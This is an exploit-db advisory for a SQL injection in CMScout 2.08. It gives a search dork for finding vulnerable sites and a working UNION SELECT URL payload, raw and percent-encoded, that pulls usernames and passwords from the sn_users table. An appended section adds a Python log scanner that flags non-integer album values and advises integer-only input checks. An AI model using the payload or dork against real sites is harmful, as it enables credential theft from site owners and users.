CMScout 2.08 – SQL Injection

  • Author: Dr.0rYX & Cr3W-DZ
    Date: 2010-04-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12407/
  • # Title: CMScout 2.08 SQL Injection Vulnerability
    # EDB-ID: 
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Dr.0rYX and Cr3w-DZ
    # Published: 
    # Verified: 
    
    ALGERIAN HACKER
    **********************- NORTH-AFRICA SECURITY TEAM -***********************
     
    [!] Title :CMScout 2.08 SQL Injection Vulnerability
    [!] Author: Dr.0rYX and Cr3w-DZ
    [!] MAIL: vx3@hotmail.de&Cr3w@hotmail.de
     
    ***************************************************************************/
     
    [ Software Information ]
     
    [+] Vendor : http://www.cmscout.za.net/
    [+] script : CMScout 2.08
    [+] Download : http://www.cmscout.co.za/index.php?page=downloads&menuid=9
    [+] Vulnerability : php SQL injection
    [+] Dork :Powered by CMScout (c)2005 CMScout Group
    
     
    **************************************************************************/
    [ Vulnerable File ]
     
    http://server/index.php?page=photos&album=[N.A.S.T ]
     
    [ Exploit ]
     
    http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--
     
     
     
    [ Example]
     
    http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
     
    [Greets ]
     
    [+] :CLAW , exploit-db.com,all my friends....
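
Added example, not part of the original advisory: a log check a defender could run for requests to index.php?page=photos whose album value is not a plain integer, which catches both the raw and the percent-encoded request forms shown above. The log lines are constructed, and the rule that legitimate album IDs are non-negative integers is an assumption not stated in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log; lines 2 and 3 reuse the request strings from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Apr/2010:10:00:00 +0000] '
    '"GET /index.php?page=photos&album=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Apr/2010:10:00:05 +0000] '
    '"GET /index.php?page=photos&album=-1+UNION+ALL+SELECT+1,'
    'concat(uname,0x3a,passwd),3,4,5+from+sn_users-- HTTP/1.1" 200 4031',
    '198.51.100.7 - - [26/Apr/2010:10:00:09 +0000] '
    '"GET /index.php?page=photos&album=-1+UNION+ALL+SELECT+1,'
    'concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users-- HTTP/1.1" 200 4031',
    '192.0.2.10 - - [26/Apr/2010:10:01:00 +0000] '
    '"GET /index.php?page=downloads&menuid=9 HTTP/1.1" 200 2210',
]


def suspicious_album(log_line):
    """Return the decoded album value if it is not a plain integer, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # parse_qs decodes '+' and %XX, so encoded and raw requests compare equal.
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if query.get("page") != ["photos"]:
        return None
    for value in query.get("album", []):
        # Assumption: a legitimate album ID is a non-negative integer.
        if not re.fullmatch(r"\d+", value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_album_value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_album(line)
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric album value: {value!r}")
```

The same integer-only rule, enforced server-side on the album parameter before it reaches the query, is the corresponding input check.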